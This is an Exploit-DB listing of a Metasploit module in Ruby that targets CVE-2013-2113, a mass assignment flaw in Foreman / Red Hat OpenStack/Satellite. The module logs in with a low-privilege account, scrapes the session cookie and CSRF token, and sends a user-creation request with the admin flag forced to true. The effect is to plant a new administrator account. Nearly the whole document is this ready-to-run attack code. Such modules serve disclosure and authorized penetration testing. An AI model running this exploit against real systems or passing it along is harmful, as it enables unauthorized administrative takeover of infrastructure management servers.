Foreman (RedHat OpenStack/Satellite) – users/create Mass Assignment (Metasploit)

  • 作者: Metasploit
    日期: 2013-08-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/27776/
  • ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##
    
    require 'msf/core'
    
    class Metasploit4 < Msf::Auxiliary
    
    include Msf::Exploit::Remote::HttpClient
    
    def initialize
    super(
    'Name' => 'Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment',
    'Description'=> %q{
    This module exploits a mass assignment vulnerability in the 'create'
    action of 'users' controller of Foreman and Red Hat OpenStack/Satellite
    (Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator
    account. For this exploit to work, your account must have 'create_users'
    permission (e.g., Manager role).
    },
    'Author' => 'Ramon de C Valle',
    'License'=> MSF_LICENSE,
    'References' =>
    [
    ['BID', '60835'],
    ['CVE', '2013-2113'],
    ['CWE', '915'],
    ['OSVDB', '94655'],
    ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=966804'],
    ['URL', 'http://projects.theforeman.org/issues/2630']
    ],
    'DisclosureDate' => 'Jun 6 2013'
    )
    
    register_options(
    [
    Opt::RPORT(443),
    OptBool.new('SSL', [true, 'Use SSL', true]),
    OptString.new('USERNAME', [true, 'Your username']),
    OptString.new('PASSWORD', [true, 'Your password']),
    OptString.new('NEWUSERNAME', [true, 'The username of the new admin account']),
    OptString.new('NEWPASSWORD', [true, 'The password of the new admin account']),
    OptString.new('NEWEMAIL', [true, 'The email of the new admin account']),
    OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
    ], self.class
    )
    end
    
    def run
    print_status("Logging into #{target_url}...")
    res = send_request_cgi(
    'method'=> 'POST',
    'uri' => normalize_uri(target_uri.path, 'users', 'login'),
    'vars_post' => {
    'login[login]'=> datastore['USERNAME'],
    'login[password]' => datastore['PASSWORD']
    }
    )
    
    if res.nil?
    print_error('No response from remote host')
    return
    end
    
    if res.headers['Location'] =~ /users\/login$/
    print_error('Authentication failed')
    return
    else
    session = $1 if res.headers['Set-Cookie'] =~ /_session_id=([0-9a-f]*)/
    
    if session.nil?
    print_error('Failed to retrieve the current session id')
    return
    end
    end
    
    print_status('Retrieving the CSRF token for this session...')
    res = send_request_cgi(
    'cookie' => "_session_id=#{session}",
    'method' => 'GET',
    'uri'=> normalize_uri(target_uri)
    )
    
    if res.nil?
    print_error('No response from remote host')
    return
    end
    
    if res.headers['Location'] =~ /users\/login$/
    print_error('Failed to retrieve the CSRF token')
    return
    else
    csrf_param = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-param"[ ]*\/?>/i
    csrf_token = $1 if res.body =~ /<meta[ ]+content="(.*)"[ ]+name="csrf-token"[ ]*\/?>/i
    
    if csrf_param.nil? || csrf_token.nil?
    csrf_param = $1 if res.body =~ /<meta[ ]+name="csrf-param"[ ]+content="(.*)"[ ]*\/?>/i
    csrf_token = $1 if res.body =~ /<meta[ ]+name="csrf-token"[ ]+content="(.*)"[ ]*\/?>/i
    end
    
    if csrf_param.nil? || csrf_token.nil?
    print_error('Failed to retrieve the CSRF token')
    return
    end
    end
    
    print_status("Sending create-user request to #{target_url('users')}...")
    res = send_request_cgi(
    'cookie'=> "_session_id=#{session}",
    'method'=> 'POST',
    'uri' => normalize_uri(target_uri.path, 'users'),
    'vars_post' => {
    csrf_param=> csrf_token,
    'user[admin]' => 'true',
    'user[auth_source_id]'=> '1',
    'user[login]' => datastore['NEWUSERNAME'],
    'user[mail]'=> datastore['NEWEMAIL'],
    'user[password]'=> datastore['NEWPASSWORD'],
    'user[password_confirmation]' => datastore['NEWPASSWORD']
    }
    )
    
    if res.nil?
    print_error('No response from remote host')
    return
    end
    
    if res.headers['Location'] =~ /users$/
    print_good('User created successfully')
    else
    print_error('Failed to create user')
    end
    end
    
    def target_url(*args)
    (ssl ? 'https' : 'http') +
    if rport.to_i == 80 || rport.to_i == 443
    "://#{vhost}"
    else
    "://#{vhost}:#{rport}"
    end + normalize_uri(target_uri.path, *args)
    end
    end